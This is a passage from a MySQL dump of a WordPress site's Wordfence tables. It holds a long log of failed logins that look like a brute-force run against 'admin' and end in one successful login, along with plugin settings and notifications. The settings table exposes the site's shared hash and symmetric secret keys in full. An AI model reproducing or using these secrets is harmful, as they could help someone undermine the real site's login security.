Safari/537.36'),(4411,7225,1629765569.396921,1,'loginFailInvalidUsername','wheretos',0,'\0\0\0\0\0\0\0\0\0\0���w�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4412,7226,1629766581.370744,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����n�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(4413,7227,1629768045.037718,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\'l\0�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36'),(4414,7229,1629770976.623984,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]�_','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(4415,7233,1629778282.182907,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/sM�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),(4416,7233,1629778282.361994,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/sM�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),(4417,7234,1629781198.149469,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C�=�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),(4418,7235,1629782199.967482,1,'loginFailInvalidUsername','admin_rustam',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4419,7236,1629782200.443154,1,'loginFailInvalidUsername','admin_rustam',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4420,7237,1629782200.926685,1,'loginFailInvalidUsername','admin_rustam',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4421,7238,1629782673.205985,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(z��','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(4422,7239,1629784136.924256,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(4423,7240,1629785608.074722,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����T�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'),(4424,7240,1629785608.120860,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����T�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'),(4425,7241,1629787073.717902,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QEˣ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(4426,7242,1629788544.556594,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(4427,7244,1629791484.580670,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����/�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(4428,7248,1629798946.542379,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(4429,7249,1629800653.903625,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_կ�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36'),(4430,7251,1629806797.039124,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0���JL�','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),(4431,7252,1629829600.724944,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4432,7253,1629830031.009510,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"@�f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4433,7254,1629830245.585085,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���:��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4434,7255,1629830462.945150,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ν�:','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4435,7256,1629830696.883421,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B!�l','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4436,7257,1629830943.593951,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��w4�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4437,7258,1629831427.597971,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4438,7259,1629831687.881985,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��J�g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4439,7260,1629831931.441965,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���>!�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4440,7261,1629832209.702835,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@u�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4441,7262,1629832502.989867,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gV�]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4442,7262,1629832503.610058,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gV�]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4443,7263,1629832756.526385,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.ec','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4444,7264,1629833075.473942,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N�(�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4445,7265,1629833338.546001,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4446,7267,1629833888.740406,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4447,7267,1629833888.756160,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4448,7268,1629834162.599932,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4449,7269,1629834448.294644,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4450,7270,1629834720.015555,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4451,7271,1629835016.231890,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����4','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4452,7272,1629835316.430910,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���VK�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4453,7273,1629835586.421932,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"}6�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4454,7274,1629835623.419092,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����d�','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSN Optimized;ENAU)'),(4455,7275,1629835903.339685,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4456,7277,1629836482.630938,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g|]�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4457,7278,1629836815.927207,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%�[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4458,7279,1629837418.740431,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4459,7280,1629837710.764598,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4460,7281,1629838022.035518,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��u,�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4461,7282,1629838329.382022,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���֣%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4462,7283,1629838639.504435,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���5T�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4463,7284,1629838960.078957,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�e2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4464,7285,1629839251.197856,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4465,7286,1629839600.215177,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4466,7287,1629839908.831558,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4467,7288,1629840241.038237,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@�:�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4468,7289,1629840538.882443,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@u_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4469,7291,1629841200.513256,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�e2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4470,7293,1629841818.932360,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g|_Y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4471,7294,1629842154.923249,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4472,7297,1629843172.207533,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4473,7299,1629843859.907031,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ŃB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4474,7304,1629845929.583042,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4475,7305,1629846259.836968,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C͘','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4476,7306,1629846995.169575,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���3�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4477,7307,1629847328.918018,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C͘','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4478,7308,1629847659.274158,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��}Ϋ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4479,7310,1629848378.246105,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g��R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4480,7311,1629848749.309926,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4481,7313,1629849460.115848,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4482,7316,1629850530.148620,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����kQ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4483,7317,1629850922.111171,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N�$b','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4484,7321,1629852393.614212,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4485,7324,1629853861.880141,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����O�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4486,7324,1629853861.926805,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����O�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4487,7327,1629855034.387341,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���˰R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4488,7330,1629856191.176872,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��j)�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4489,7331,1629856589.412660,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4490,7333,1629857383.079554,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dc�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4491,7334,1629857769.551238,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4492,7339,1629860153.019057,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4493,7341,1629861036.909487,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���1T&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4494,7342,1629861365.813956,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4495,7343,1629861770.757557,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dt','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4496,7344,1629862181.520454,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4497,7345,1629862580.386479,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^+.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4498,7347,1629863385.266601,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4499,7348,1629863768.425819,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���5�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4500,7350,1629864604.620346,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4501,7353,1629865832.269393,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��2tb','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4502,7354,1629866280.895824,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��}Ϋ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4503,7355,1629866722.204715,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[h�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4504,7357,1629867680.380000,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����PZ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4505,7358,1629867967.434488,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-w��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4506,7359,1629868176.288409,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����P�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4507,7360,1629868403.093931,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4508,7361,1629868630.303312,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4509,7362,1629868830.431850,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4510,7363,1629869060.022703,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����I','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4511,7364,1629869265.308392,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��U���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4512,7365,1629869479.085593,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��x','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4513,7366,1629870993.525240,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��2M_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4514,7367,1629871184.224385,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���A�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4515,7368,1629871384.762633,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4516,7369,1629871609.228594,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��}Ϋ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4517,7370,1629871800.492892,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��}�9','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4518,7371,1629872011.102736,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"^��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4519,7372,1629872147.109362,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0��gF�~','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0');
/*!40000 ALTER TABLE `wp_wflogins` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfls_2fa_secrets`
--

DROP TABLE IF EXISTS `wp_wfls_2fa_secrets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfls_2fa_secrets` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL,
  `secret` tinyblob NOT NULL,
  `recovery` blob NOT NULL,
  `ctime` int(10) unsigned NOT NULL,
  `vtime` int(10) unsigned NOT NULL,
  `mode` enum('authenticator') NOT NULL DEFAULT 'authenticator',
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfls_2fa_secrets`
--

LOCK TABLES `wp_wfls_2fa_secrets` WRITE;
/*!40000 ALTER TABLE `wp_wfls_2fa_secrets` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfls_2fa_secrets` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfls_settings`
--

DROP TABLE IF EXISTS `wp_wfls_settings`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfls_settings` (
  `name` varchar(191) NOT NULL DEFAULT '',
  `value` longblob DEFAULT NULL,
  `autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfls_settings`
--

LOCK TABLES `wp_wfls_settings` WRITE;
/*!40000 ALTER TABLE `wp_wfls_settings` DISABLE KEYS */;
INSERT INTO `wp_wfls_settings` VALUES ('allow-xml-rpc','1','yes'),('captcha-stats','{\"counts\":[0,0,0,0,0,0,0,0,0,0,0],\"avg\":0}','yes'),('delete-deactivation','','yes'),('enable-auth-captcha','','yes'),('global-notices','[]','yes'),('ip-source','','yes'),('ip-trusted-proxies','','yes'),('last-secret-refresh','1624358011','yes'),('ntp-offset','0.97953701019287','yes'),('recaptcha-threshold','0.5','yes'),('remember-device','','yes'),('remember-device-duration','2592000','yes'),('require-2fa-grace-period-enabled','','yes'),('require-2fa.administrator','','yes'),('shared-hash-secret','6fe605fcdeeb8219b268ed6a65f6abf544c481b79df45b92c2a354d32d2403a3','yes'),('shared-symmetric-secret','c71e9fa022b78ead69d2611a714fb51b472a7a5c26dd52a5f58a0b796646791e','yes'),('use-ntp','','yes'),('whitelisted','','yes'),('xmlrpc-enabled','1','yes');
/*!40000 ALTER TABLE `wp_wfls_settings` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfnotifications`
--

DROP TABLE IF EXISTS `wp_wfnotifications`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfnotifications` (
  `id` varchar(32) NOT NULL DEFAULT '',
  `new` tinyint(3) unsigned NOT NULL DEFAULT 1,
  `category` varchar(255) NOT NULL,
  `priority` int(11) NOT NULL DEFAULT 1000,
  `ctime` int(10) unsigned NOT NULL,
  `html` text NOT NULL,
  `links` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfnotifications`
--

LOCK TABLES `wp_wfnotifications` WRITE;
/*!40000 ALTER TABLE `wp_wfnotifications` DISABLE KEYS */;
INSERT INTO `wp_wfnotifications` VALUES ('site-AEAAAAA',1,'wfplugin_updates',502,1629801260,'<a href=\"https://www.equalitywalk.org.uk/wp-adminupdate-core.php\">Updates are available for WordPress (v5.8), 4 plugins, and 29 themes</a>','[]'),('site-AQAAAAA',1,'wfplugin_scan',502,1629801262,'<a href=\"https://www.equalitywalk.org.uk/wp-adminadmin.php?page=WordfenceScan\">51 issues found in most recent scan</a>','[]');
